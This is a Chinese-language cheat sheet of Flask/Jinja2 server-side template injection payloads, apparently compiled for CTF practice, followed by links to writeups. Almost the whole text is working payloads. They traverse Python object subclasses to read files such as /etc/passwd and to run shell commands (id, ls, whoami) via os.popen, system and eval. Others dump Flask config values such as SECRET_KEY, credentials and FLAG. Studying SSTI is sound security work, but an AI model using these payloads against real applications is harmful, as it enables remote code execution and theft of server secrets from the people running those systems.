以下未说明情况下都是在python3.7.7环境测试。
{{''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['open']('test.txt').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == '_ModuleLock' %}
{% for b in c.__init__.__globals__ %}
{%if b =='__builtins__' %}
{% print(c.__init__.__globals__['__builtins__']['open']('test.txt').read()) %}
{%endif%}
{% endfor %}
{% endif %}
{% endfor %}
上面的’’.class.mro[1].subclasses()[75]等于
{{ ''.__class__.__mro__[1].__subclasses__()[345]('test.txt').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}
{{ ''.__class__.__mro__[1].__subclasses__()[183].__init__.__globals__.values()['eval']('__import__("os").popen('id').read()') }}
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__
下有eval,__import__等的全局函数,可以利用此来执行命令:
#eval
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
#__import__
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
().__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__['system']('ls')
().__class__.__bases__[0].__subclasses__()[93].__init__.__globals__["sys"].modules["os"].system("ls")
''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("ls")
[].__class__.__base__.__subclasses__()[127].__init__.__globals__['system']('ls')
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].popen('whoami').read()}}
{{config.items()}}
其中包含应用程序的所有配置值。在大多数情况下,这包括敏感值,例如数据库连接字符串,第三方服务的凭证,SECRET_KEY等。
例如:
url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等
如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)。
{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}
http://15h3na0.xyz/2020/02/24/ICQ%20GYCTF2020/#Day3-Flaskapp
https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html
wp:https://medium.com/hmif-itb/rootersctf-2019-writeup-d500434c85fe#90d9
https://github.com/vulhub/vulhub/tree/master/flask/ssti
https://www.cnblogs.com/20175211lyz/p/11425368.html
https://0day.work/jinja2-template-injection-filter-bypasses/
https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8
https://xz.aliyun.com/t/3679#toc-6
https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f
https://www.smi1e.top/flask-jinja2-ssti-%E5%AD%A6%E4%B9%A0/
https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee